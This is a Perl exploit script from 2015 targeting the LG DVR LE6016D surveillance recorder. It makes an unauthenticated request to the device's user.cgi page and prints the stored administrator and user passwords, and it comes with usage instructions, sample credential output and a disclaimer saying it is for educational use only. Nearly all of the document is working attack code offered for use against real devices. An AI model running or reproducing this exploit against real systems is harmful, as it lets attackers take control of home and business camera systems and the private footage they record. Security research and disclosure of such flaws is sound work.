LG DVR LE6016D unauthenticated remote u:p disclosure exploit

1. #!/usr/bin/perl
2. #
3. #              LG DVR LE6016D unauthenticated remote
4. #               users/passwords disclosure exploit
5. #
6. #
7. #                Copyright 2015 (c) Todor Donev
8. #                  <todor.donev at gmail.com>
9. #                http://www.ethical-hacker.org/
10. ####
11. #
12. #  Digital video recorder (DVR) surveillance is the use of cameras,
13. #  often hidden or concealed, that use DVR technology to record
14. #  video for playback or immediate viewing. As technological
15. #  innovations have made improvements in the security and
16. #  surveillance industry, DVR surveillance has become more
17. #  prominent and allows for easier and more versatile security
18. #  systems in homes and businesses. A DVR surveillance security
19. #  system can be designed for indoor use or outdoor use and can
20. #  often involve hidden security cameras, concealed “nanny cams”
21. #  for home security, and even personal recording devices hidden
22. #  on a person.
23. #
24. ####
25. #
26. #  Description:
27. #  No authentication (login) is required to exploit this vulnerability.
28. #  This program demonstrates how unpatched security bug would enable
29. #  hackers to gain control of a vulnerable device while sitting
30. #  behind their keyboard, potentially thousands of miles away.
31. #  An unauthenticated attacker that is connected to the DVR's may be
32. #  able to retrieve the device's administrator password allowing them
33. #  to directly access the device's configuration control panel.
34. #
35. ####
36. #
37. #  Disclaimer:
38. #  This or previous programs is for Educational purpose ONLY. Do not
39. #  use it without permission.The usual disclaimer applies, especially
40. #  the fact that Todor Donev is not liable for any damages caused by
41. #  direct or indirect use of the information or functionality provided
42. #  by these programs. The author or any Internet provider bears NO
43. #  responsibility for content or misuse of these programs or any
44. #  derivatives thereof. By using these programs you accept the fact
45. #  that any damage (dataloss, system crash, system compromise, etc.)
46. #  caused by the use of these programs is not Todor Donev's
47. #  responsibility.
48. #
49. ####
50. #                Use them at your own risk!
51. ####
52. #
53. #         $ perl lg.pl 133.7.133.7:80
54. #            LG DVR LE6016D unauthenticated remote
55. #              users/passwords disclosure exploit
56. #                    u/p: admin/000000
57. #                    u/p: user1/000000
58. #                    u/p: user2/000000
59. #                    u/p: user3/000000
60. #                    u/p: LOGOUT/000000
61. #               Copyright 2015 (c) Todor Donev
62. #                 <todor.donev at gmail.com>
63. #               http://www.ethical-hacker.org/
64. #
65. ####
66.  
67. use LWP::Simple;
68. print "   LG DVR LE6016D unauthenticated remote\n     users/passwords disclosure exploit\n";
69. if (@ARGV == 0) {&usg; &foot;}
70. while (@ARGV > 0) {
71. $t = shift(@ARGV);
72. }
73. my $r = get("http://$t/dvr/wwwroot/user.cgi") or die("Error $!");
74. for (my $i=0; $i <= 4; $i++){
75. if  ($r =~ m/<name>(.*)<\/name>/g){
76. print "           u\/p: $1\/";
77. }
78. if  ($r =~ m/<pw>(.*)<\/pw>/g){
79. print "$1\n";
80. }
81. }
82. &foot;
83. sub usg(){
84. print "\n Usage: perl $0 <target:port>\n Example: perl $0 133.7.133.7:80\n\n";
85. }
86. sub foot(){
87. print "      Copyright 2015 (c) Todor Donev\n        <todor.donev at gmail.com>\n";
88. print "      http://www.ethical-hacker.org/\n";
89. exit;
90. }